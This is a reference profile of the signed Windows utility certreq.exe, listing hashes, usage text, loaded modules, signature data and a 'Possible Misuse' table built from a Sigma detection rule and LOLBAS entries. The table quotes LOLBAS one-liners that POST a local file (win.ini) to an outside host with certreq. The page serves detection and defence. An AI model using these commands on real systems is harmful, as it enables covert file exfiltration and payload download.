certreq.exe

File Path: C:\Windows\system32\certreq.exe
Description: CertReq.exe

Screenshot

certreq.exe

Hashes

Type	Hash
MD5	`7D99C3B2EEF43CA0548FF13D2D4A1CE8`
SHA1	`4C0A33BBE4D2BA923689C40E7A05A6E6A171B72F`
SHA256	`4065FB5985ADBBC7EBAF8A366B231C92F951EEBF5C65B95483D7E6167788AEE6`
SHA384	`D1A0E946708FC1C6C5121050B72B6C2CDFA372CA79C630DE2D4000972BC30131A3636313003DFB637E31D9A92AD3DFEA`
SHA512	`6694737B5223DEE8A08C11B727FECE18DE51B99E1FD86EB616B85F2B0B04EB8CE12DDE49820213BB9A6AC396FEDAA272621A4AB6E33E0AC3A6428687BCC90171`
SSDEEP	`6144:M62AdniOoa+LXUHicxKwmiduCNsjFC0bQxJoKMncc5FtgTRjF/Q:L2KniOlKCxxEidxsjFLyyVnd5OzY`
IMP	`229AAC8C84DBF30E51CDA201437DC2C8`
PESHA1	`BA9B677EA1836C5860796011E558F91BE9F60121`
PE256	`2A5FD90664A5C5CFF0128FE913E73321045DD40AC9522847F306B9A207913494`

Runtime Data

Usage (stdout):

Usage:
  CertReq -?
  CertReq [-v] -?
  CertReq [-Command] -?

  CertReq [-Submit] [Options] [RequestFileIn [CertFileOut [CertChainFileOut [FullResponseFileOut]]]]
    Submit a request to a Certification Authority.

  Options:
    -attrib AttributeString
    -binary
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -crl
    -rpc
    -AdminForceMachine
    -RenewOnBehalfOf
    -NoChallenge

  CertReq -Retrieve [Options] RequestId [CertFileOut [CertChainFileOut [FullResponseFileOut]]]
    Retrieve a response to a previous request from a Certification Authority.

  Options:
    -binary
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -crl
    -rpc
    -AdminForceMachine

  CertReq -New [Options] [PolicyFileIn [RequestFileOut]]
    Create a new request as directed by PolicyFileIn

  Options:
    -attrib AttributeString
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -user
    -machine
    -xchg ExchangeCertFile

  CertReq -Accept [Options] [CertChainFileIn | FullResponseFileIn | CertFileIn]
    Accept and install a response to a previous new request.

  Options:
    -user 
    -machine 
    -pin Pin

  CertReq -Policy [Options] [RequestFileIn [PolicyFileIn [RequestFileOut [PKCS10FileOut]]]]
    Construct a cross certification or qualified subordination request
    from an existing CA certificate or from an existing request.

  Options:
    -attrib AttributeString
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -noEKU
    -AlternateSignatureAlgorithm
    -HashAlgorithm HashAlgorithm

  CertReq -Sign [Options] [RequestFileIn [RequestFileOut]]
    Sign a certificate request with an enrollment agent or qualified
    subordination signing certificate.

  Options:
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -crl
    -noEKU
    -HashAlgorithm HashAlgorithm

  CertReq -Enroll [Options] TemplateName
  CertReq -Enroll -cert CertId [Options] Renew [ReuseKeys]
    Enroll for or renew a certificate.

  Options:
    -PolicyServer PolicyServer
    -user 
    -machine 
    -pin Pin

  CertReq -EnrollAIK [Options] [KeyContainerName]
    Enroll for AIK certificate.

  Options:
    -config

  CertReq -EnrollCredGuardCert [Options] TemplateName [ExtensionInfFile]
    Enroll for machine account Credential Guard certificate.

  Options:
    -config

  CertReq -EnrollLogon [Options]
    Enroll for Hello for Business Logon certificate via ADFS.

  Options:
    -q

  CertReq -Post [Options]
    POST an http request.

  Options:
    -attrib AttributeString
    -config URL

Unknown argument: --help

Child Processes:

conhost.exe

Window Title:

Certificate Request Processor

Open Handles:

Path	Type
(R-D) C:\Windows\Fonts\StaticCache.dat	File
(R-D) C:\Windows\System32\en-US\certreq.exe.mui	File
(R-D) C:\Windows\System32\en-US\KernelBase.dll.mui	File
(RW-) C:\Users\user	File
\BaseNamedObjects\C:ProgramDataMicrosoftWindowsCaches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db	Section
\BaseNamedObjects\C:ProgramDataMicrosoftWindowsCaches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db	Section
\BaseNamedObjects\C:ProgramDataMicrosoftWindowsCaches*cversions.2.ro	Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0	Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0	Section
\Sessions\2\Windows\Theme2131664586	Section
\Windows\Theme966197582	Section

Loaded Modules:

Path
C:\Windows\System32\ADVAPI32.dll
C:\Windows\System32\bcrypt.dll
C:\Windows\System32\bcryptPrimitives.dll
C:\Windows\system32\certca.dll
C:\Windows\system32\certcli.dll
C:\Windows\system32\certreq.exe
C:\Windows\System32\cfgmgr32.dll
C:\Windows\System32\combase.dll
C:\Windows\System32\CRYPT32.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\system32\dwmapi.dll
C:\Windows\System32\GDI32.dll
C:\Windows\System32\gdi32full.dll
C:\Windows\System32\IMM32.DLL
C:\Windows\System32\kernel.appcore.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\MSASN1.dll
C:\Windows\System32\MSCTF.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\System32\msvcrt.dll
C:\Windows\system32\ncrypt.dll
C:\Windows\System32\Normaliz.dll
C:\Windows\system32\NTASN1.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\ole32.dll
C:\Windows\System32\OLEAUT32.dll
C:\Windows\System32\profapi.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\sechost.dll
C:\Windows\system32\Secur32.dll
C:\Windows\System32\SETUPAPI.dll
C:\Windows\System32\SHLWAPI.dll
C:\Windows\system32\SSPICLI.DLL
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\USER32.dll
C:\Windows\system32\uxtheme.dll
C:\Windows\System32\win32u.dll
C:\Windows\system32\WININET.dll
C:\Windows\System32\WLDAP32.dll

Signature

Status: Signature verified.
Serial: 33000001C422B2F79B793DACB20000000001C4
Thumbprint: AE9C1AE54763822EEC42474983D8B635116C8452
Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

Original Filename: CertReq.exe.mui
Product Name: Microsoft Windows Operating System
Company Name: Microsoft Corporation
File Version: 10.0.17763.1 (WinBuild.160101.0800)
Product Version: 10.0.17763.1
Language: English (United States)
Machine Type: 64-bit

File Scan

VirusTotal Detections: 0/73
VirusTotal Link: https://www.virustotal.com/gui/file/4065fb5985adbbc7ebaf8a366b231c92f951eebf5c65b95483d7e6167788aee6/detection/

Possible Misuse

The following table contains possible examples of certreq.exe being misused. While certreq.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source	Source File	Example	License
sigma	proc_creation_win_susp_certreq_download.yml	`title: Suspicious Certreq Command to Download`	DRL 1.0
sigma	proc_creation_win_susp_certreq_download.yml	`description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files`	DRL 1.0
sigma	proc_creation_win_susp_certreq_download.yml	`- https://lolbas-project.github.io/lolbas/Binaries/Certreq/`	DRL 1.0
sigma	proc_creation_win_susp_certreq_download.yml	`Image\\|endswith: '\certreq.exe'`	DRL 1.0
LOLBAS	Certreq.yml	`Name: CertReq.exe`
LOLBAS	Certreq.yml	`- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt`
LOLBAS	Certreq.yml	`- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal`
LOLBAS	Certreq.yml	`- Path: C:\Windows\System32\certreq.exe`
LOLBAS	Certreq.yml	`- Path: C:\Windows\SysWOW64\certreq.exe`
LOLBAS	Certreq.yml	`- IOC: certreq creates new files`
LOLBAS	Certreq.yml	`- IOC: certreq makes POST requests`
LOLBAS	Certreq.yml	`- Link: https://dtm.uk/certreq`